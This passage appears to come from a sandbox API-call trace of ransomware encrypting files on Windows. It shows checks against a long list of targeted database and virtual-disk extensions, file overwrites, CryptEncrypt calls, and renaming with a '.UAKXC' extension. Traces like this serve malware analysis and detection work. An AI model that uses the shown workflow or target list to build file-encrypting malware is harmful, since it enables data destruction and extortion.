(lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".scx") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".sis") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".spq") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".sql") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".te") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".temx") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".tps") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".trc") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".trm") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".udb") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".udl") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".usr") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".v12") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".vis") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0140.738] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".xld") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".abs") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".abx") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".adn") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".db2") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".icg") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".icr") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".lut") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".maw") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0140.739] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0140.740] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0140.740] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0140.740] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0140.740] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0140.740] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".raw") returned 0x0 [0140.740] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0140.740] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0140.740] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".bin") returned 0x0 [0140.740] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0140.740] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0140.740] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0140.740] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0140.740] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0140.740] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0140.740] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".iso") returned 0x0 [0140.740] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.740] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0140.742] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0140.742] SetEndOfFile (hFile=0x6c8) returned 1 [0140.742] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.742] ReadFile (in: hFile=0x6c8, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x15e, lpOverlapped=0x0) returned 1 [0140.742] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.742] WriteFile (in: hFile=0x6c8, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x15e, lpOverlapped=0x0) returned 1 [0140.743] CloseHandle (hObject=0x6c8) returned 1 [0140.752] GetProcessHeap () returned 0xea0000 [0140.752] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef34d0 [0140.752] lstrcpyW (in: lpString1=0xef34d0, lpString2="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" [0140.752] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.UAKXC" [0140.752] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn.uakxc")) returned 1 [0140.753] GetProcessHeap () returned 0xea0000 [0140.753] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef34d0 | out: hHeap=0xea0000) returned 1 [0140.753] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee9c8 | out: hHeap=0xea0000) returned 1 [0140.753] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e20 | out: hHeap=0xea0000) returned 1 [0140.753] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0140.753] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0140.753] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0140.754] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn")) returned 0x2022 [0140.755] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0140.755] GetLastError () returned 0x0 [0140.755] GetFileSizeEx (in: hFile=0x6c8, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=326) returned 1 [0140.755] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0140.756] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0140.756] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0140.756] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0140.756] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".accde") returned 0x0 [0140.756] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0140.756] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0140.756] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".accft") returned 0x0 [0140.756] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".adb") returned 0x0 [0140.756] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".ade") returned 0x0 [0140.756] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".adf") returned 0x0 [0140.756] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".adp") returned 0x0 [0140.756] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".arc") returned 0x0 [0140.756] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".ora") returned 0x0 [0140.756] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".alf") returned 0x0 [0140.756] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".ask") returned 0x0 [0140.756] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".btr") returned 0x0 [0140.756] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0140.756] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".cat") returned 0x0 [0140.756] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".cma") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".dad") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".db") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".db3") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".dct") returned 0x0 [0140.757] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".eco") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".edb") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".epim") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".exb") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".fic") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0140.758] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".fol") returned 0x0 [0140.759] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0140.759] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0140.769] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0140.769] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0140.769] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0140.769] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".frm") returned 0x0 [0140.769] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0140.769] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0140.769] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0140.769] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0140.769] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".his") returned 0x0 [0140.769] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".ib") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".idb") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".itw") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".jet") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".maf") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".maq") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".mar") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".mas") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".mav") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0140.770] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".mud") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".myd") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0140.771] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0140.771] 